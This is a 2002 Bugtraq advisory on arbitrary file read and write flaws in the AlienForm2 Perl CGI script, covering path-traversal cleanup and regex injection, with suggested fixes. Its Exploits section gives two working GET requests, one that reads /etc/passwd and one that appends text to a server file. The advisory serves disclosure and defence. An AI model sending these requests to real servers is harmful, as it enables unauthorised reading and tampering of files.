Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

AlienForm2 CGI script: arbitrary file read/write

From: Nick Cleaton <nick () cleaton net>
Date: Mon, 10 Jun 2002 22:18:53 +0100
=====================================================================  

Vulnerable:     AlienForm2 revision 1.5
Category:       Perl/CGI coding errors
Impact:         Subject to file permissions, an attacker can read any
                file on the server, append arbitrary data to any
                existing file or write arbitrary data to new files.
Date:           10th June 2002
Vendor:         Jon Hedley
Homepage:       http://www.cgi.tj/scripts/alienform/
Vendor Status:  Notified 24th April 2002
Vendor Fix:     None available


Details
=======

AlienForm2 by Jon Hedley is a template driven form processing Perl
CGI script.  It is normally installed as af.cgi or alienform.cgi.
Template files on the server are used to configure the format of the
output document, the name of a log file and the format of the data to
append to the log file.

AlienForm2 is published under a licence that does not allow me to
reproduce parts of it here without permission, which I have been
unable to obtain.  This advisory is best read in conjunction with a
copy of af.cgi.

The paths to the template files come from CGI inputs, and a flaw in
the code that cleans up those inputs allows any file on the server to
be used as a template file.  The cleanup code replaces bad characters
and constructs with the empty string, and the input string ".|./" is
transformed by the cleanup code to "../".  

The path cleanup code can be found on lines 185, 186, 197 and 198 of
af.cgi.

The name of a CGI input in square brackets in a template is replaced
with the value of that input.  The regular expression which performs
the replacement is not resilient to regular expression metacharacters
in the name of a CGI input, allowing an attacker to take full control
of the contents of a template after CGI input substitution.  

The CGI input substitution code can be found on line 246 of af.cgi.


Suggested Fix
=============

On lines 185 and 197, change [] to [_]

On lines 186 and 198, change // to /_/

On lines 246 and 248, change $key to \Q$key\E


Exploits
========

Arbitrary file disclosure:

GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F
.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

File writing:

This proof of concept exploit appends the text "hello there" to the
file /tmp/foo on the web server.  It requires the existence of the
file /tmp/passwd, consisting of just the three lines:

root:*:0:0:Charlie &:/root:/bin/csh
httpd:*:1004:1004:Apache daemon:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

This exploit can be readily adapted to use any other file of two or
more lines in place of /tmp/passwd, and the file disclosure
vulnerability could be used to find a suitable file.  That process
could be automated.

GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http
d.*|x9=hello+there&x9|^nobody.*%0A|x9=
 
=====================================================================  

--
Nick Cleaton
nick () cleaton net
Previous By Date Next
Previous By Thread Next

Current thread: